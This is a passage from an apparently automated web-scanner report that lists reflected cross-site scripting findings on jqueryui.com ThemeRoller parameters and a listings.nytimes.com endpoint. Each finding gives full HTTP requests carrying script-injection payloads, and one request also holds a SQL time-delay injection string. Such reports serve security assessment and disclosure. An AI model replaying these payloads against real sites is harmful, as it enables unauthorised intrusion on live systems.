GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff5287f"><script>alert(1)</script>c5daa8ea141&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff5287f"><script>alert(1)</script>c5daa8ea141&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.
...[SNIP]...

4.172. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1269"><script>alert(1)</script>55ed6b8ddc4 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1d1269"><script>alert(1)</script>55ed6b8ddc4&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1d1269"><script>alert(1)</script>55ed6b8ddc4&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.pn
...[SNIP]...

4.173. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb51"><script>alert(1)</script>0aa0fcacc1c was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08dcb51"><script>alert(1)</script>0aa0fcacc1c&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08dcb51"><script>alert(1)</script>0aa0fcacc1c&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png
...[SNIP]...

4.174. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a79"><script>alert(1)</script>e2b9c487bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?a2a79"><script>alert(1)</script>e2b9c487bc1=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:56:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&a2a79"><script>alert(1)</script>e2b9c487bc1=1" type="text/css" media="all" />
...[SNIP]...

4.175. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f207"><script>alert(1)</script>b6937b6baad was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px8f207"><script>alert(1)</script>b6937b6baad&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px8f207"><script>alert(1)</script>b6937b6baad&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.176. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c51e"><script>alert(1)</script>866f1ad0c97 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px8c51e"><script>alert(1)</script>866f1ad0c97&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px8c51e"><script>alert(1)</script>866f1ad0c97&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.177. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a567e"><script>alert(1)</script>8e28c85fa0f was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50a567e"><script>alert(1)</script>8e28c85fa0f&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50a567e"><script>alert(1)</script>8e28c85fa0f&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="al
...[SNIP]...

4.178. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a79c3"><script>alert(1)</script>0133da4d252 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20a79c3"><script>alert(1)</script>0133da4d252&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ror=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20a79c3"><script>alert(1)</script>0133da4d252&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.179. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5231d"><script>alert(1)</script>6c1b949ca33 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px5231d"><script>alert(1)</script>6c1b949ca33&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px5231d"><script>alert(1)</script>6c1b949ca33&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.180. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [AdTagCountyId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the AdTagCountyId request parameter is copied into the HTML document as plain text between tags. The payload e67b1<script>alert(1)</script>cfb38d751f7a43364 was submitted in the AdTagCountyId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3e67b1<script>alert(1)</script>cfb38d751f7a43364&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:31:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3e67b1<script>alert(1)</script>cfb38d751f7a43364&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c
...[SNIP]...

4.181. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [AdTagCountyId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the AdTagCountyId request parameter is copied into the HTML document as plain text between tags. The payload 5ef5f<script>alert(1)</script>891192eefff was submitted in the AdTagCountyId parameter. This input was echoed unmodified in the application's response.

